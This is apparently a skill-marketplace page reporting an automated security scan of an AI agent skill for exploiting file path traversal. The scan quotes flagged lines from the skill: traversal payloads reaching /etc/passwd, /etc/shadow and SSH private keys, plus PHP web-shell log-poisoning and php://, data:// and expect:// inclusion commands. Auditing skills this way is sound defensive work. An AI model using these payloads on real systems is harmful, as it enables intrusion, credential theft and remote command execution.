Skip to main content

file-path-traversal

Identifies and exploits file path traversal vulnerabilities in web applications, providing detailed reports and remediation guidance.

Install this skill

or
0/100

Security score

The file-path-traversal skill was audited on Mar 9, 2026 and we found 81 security issues across 4 threat categories, including 5 critical. Review the findings below before installing.

Categories Tested

Security Issues

medium line 320

System command execution

SourceSKILL.md
320curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
medium line 326

System command execution

SourceSKILL.md
326# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
medium line 334

System command execution

SourceSKILL.md
334curl -A "<?php system('id'); ?>" \
medium line 338

System command execution

SourceSKILL.md
338curl -A "<?php system(\$_GET['c']); ?>" \
medium line 349

System command execution

SourceSKILL.md
349curl -X POST -d "<?php system('id'); ?>" \
medium line 116

Curl to non-GitHub URL

SourceSKILL.md
116# Test payloads with curl
medium line 118

Curl to non-GitHub URL

SourceSKILL.md
118curl "http://target.com/download?file=....//....//....//etc/passwd"
medium line 320

Curl to non-GitHub URL

SourceSKILL.md
320curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
medium line 323

Curl to non-GitHub URL

SourceSKILL.md
323curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
medium line 327

Curl to non-GitHub URL

SourceSKILL.md
327curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
medium line 346

Curl to non-GitHub URL

SourceSKILL.md
346curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
medium line 353

Curl to non-GitHub URL

SourceSKILL.md
353curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
medium line 356

Curl to non-GitHub URL

SourceSKILL.md
356curl "http://target.com/page?file=expect://id"
high line 103

Access to /etc/passwd

SourceSKILL.md
103../../../etc/passwd
high line 104

Access to /etc/passwd

SourceSKILL.md
104../../../../etc/passwd
high line 105

Access to /etc/passwd

SourceSKILL.md
105../../../../../etc/passwd
high line 106

Access to /etc/passwd

SourceSKILL.md
106../../../../../../etc/passwd
high line 117

Access to /etc/passwd

SourceSKILL.md
117curl "http://target.com/image?filename=../../../etc/passwd"
high line 118

Access to /etc/passwd

SourceSKILL.md
118curl "http://target.com/download?file=....//....//....//etc/passwd"
high line 125

Access to /etc/passwd

SourceSKILL.md
125/etc/passwd
high line 142

Access to /etc/passwd

SourceSKILL.md
142....//....//....//etc/passwd
high line 143

Access to /etc/passwd

SourceSKILL.md
143....\/....\/....\/etc/passwd
high line 146

Access to /etc/passwd

SourceSKILL.md
146..././..././..././etc/passwd
high line 147

Access to /etc/passwd

SourceSKILL.md
147....//....//etc/passwd
high line 151

Access to /etc/passwd

SourceSKILL.md
151%2e%2e/%2e%2e/%2e%2e/etc/passwd
high line 159

Access to /etc/passwd

SourceSKILL.md
159../../../etc/passwd%00.jpg
high line 160

Access to /etc/passwd

SourceSKILL.md
160../../../etc/passwd%00.png
high line 163

Access to /etc/passwd

SourceSKILL.md
163../../../etc/passwd...............................
high line 166

Access to /etc/passwd

SourceSKILL.md
166../../../etc/passwd.jpg.php
high line 173

Access to /etc/passwd

SourceSKILL.md
173/var/www/images/../../../etc/passwd
high line 176

Access to /etc/passwd

SourceSKILL.md
176images/../../../etc/passwd
high line 205

Access to /etc/passwd

SourceSKILL.md
205/etc/passwd # User accounts
high line 303

Access to /etc/passwd

SourceSKILL.md
303# Traverse to /etc/passwd
high line 368

Access to /etc/passwd

SourceSKILL.md
368../../../etc/passwd
high line 375

Access to /etc/passwd

SourceSKILL.md
375....//....//....//etc/passwd
high line 376

Access to /etc/passwd

SourceSKILL.md
376..;/..;/..;/etc/passwd
high line 379

Access to /etc/passwd

SourceSKILL.md
379/etc/passwd
high line 382

Access to /etc/passwd

SourceSKILL.md
382../../../etc/passwd%00.jpg
critical line 438

Access to /etc/passwd

SourceSKILL.md
438| `../../../etc/passwd` | Linux password file |
critical line 440

Access to /etc/passwd

SourceSKILL.md
440| `....//....//....//etc/passwd` | Bypass simple filter |
critical line 441

Access to /etc/passwd

SourceSKILL.md
441| `/etc/passwd` | Absolute path |
critical line 448

Access to /etc/passwd

SourceSKILL.md
448| Linux | `/etc/passwd` | User accounts |
high line 126

Access to /etc/shadow

SourceSKILL.md
126/etc/shadow
high line 206

Access to /etc/shadow

SourceSKILL.md
206/etc/shadow # Password hashes (root only)
critical line 449

Access to /etc/shadow

SourceSKILL.md
449| Linux | `/etc/shadow` | Password hashes |
medium line 103

Path traversal to sensitive directory

SourceSKILL.md
103../../../etc/passwd
medium line 104

Path traversal to sensitive directory

SourceSKILL.md
104../../../../etc/passwd
medium line 105

Path traversal to sensitive directory

SourceSKILL.md
105../../../../../etc/passwd
medium line 106

Path traversal to sensitive directory

SourceSKILL.md
106../../../../../../etc/passwd
medium line 117

Path traversal to sensitive directory

SourceSKILL.md
117curl "http://target.com/image?filename=../../../etc/passwd"
medium line 159

Path traversal to sensitive directory

SourceSKILL.md
159../../../etc/passwd%00.jpg
medium line 160

Path traversal to sensitive directory

SourceSKILL.md
160../../../etc/passwd%00.png
medium line 163

Path traversal to sensitive directory

SourceSKILL.md
163../../../etc/passwd...............................
medium line 166

Path traversal to sensitive directory

SourceSKILL.md
166../../../etc/passwd.jpg.php
medium line 173

Path traversal to sensitive directory

SourceSKILL.md
173/var/www/images/../../../etc/passwd
medium line 176

Path traversal to sensitive directory

SourceSKILL.md
176images/../../../etc/passwd
medium line 323

Path traversal to sensitive directory

SourceSKILL.md
323curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
medium line 327

Path traversal to sensitive directory

SourceSKILL.md
327curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
medium line 368

Path traversal to sensitive directory

SourceSKILL.md
368../../../etc/passwd
medium line 382

Path traversal to sensitive directory

SourceSKILL.md
382../../../etc/passwd%00.jpg
high line 438

Path traversal to sensitive directory

SourceSKILL.md
438| `../../../etc/passwd` | Linux password file |
medium line 213

Access to root home directory

SourceSKILL.md
213/root/.ssh/id_rsa # Root private key
medium line 214

Access to root home directory

SourceSKILL.md
214/root/.ssh/authorized_keys # Authorized keys
high line 213

Access to SSH directory

SourceSKILL.md
213/root/.ssh/id_rsa # Root private key
high line 214

Access to SSH directory

SourceSKILL.md
214/root/.ssh/authorized_keys # Authorized keys
high line 215

Access to SSH directory

SourceSKILL.md
215/home/<user>/.ssh/id_rsa # User private keys
low line 117

External URL reference

SourceSKILL.md
117curl "http://target.com/image?filename=../../../etc/passwd"
low line 118

External URL reference

SourceSKILL.md
118curl "http://target.com/download?file=....//....//....//etc/passwd"
low line 290

External URL reference

SourceSKILL.md
290ffuf -u "http://target.com/image?filename=FUZZ" \
low line 295

External URL reference

SourceSKILL.md
295ffuf -u "http://target.com/page?file=FUZZ" \
low line 306

External URL reference

SourceSKILL.md
306"http://target.com/index.php?file=FUZZ"
low line 311

External URL reference

SourceSKILL.md
311"http://target.com/load?path=FUZZ"
low line 320

External URL reference

SourceSKILL.md
320curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
low line 323

External URL reference

SourceSKILL.md
323curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
low line 327

External URL reference

SourceSKILL.md
327curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
low line 335

External URL reference

SourceSKILL.md
335"http://target.com/page?file=/proc/self/environ"
low line 339

External URL reference

SourceSKILL.md
339"http://target.com/page?file=/proc/self/environ&c=whoami"
low line 346

External URL reference

SourceSKILL.md
346curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
low line 350

External URL reference

SourceSKILL.md
350"http://target.com/page?file=php://input"
low line 353

External URL reference

SourceSKILL.md
353curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
low line 356

External URL reference

SourceSKILL.md
356curl "http://target.com/page?file=expect://id"
Scanned on Mar 9, 2026
View Security Dashboard
Installation guide →
GitHub Stars 21.5K
Rate this skill
Categorydevelopment
UpdatedApril 4, 2026
openclawtestingbackendsecurity-engineerqa-engineerbackend-developerdevelopment
sickn33/antigravity-awesome-skills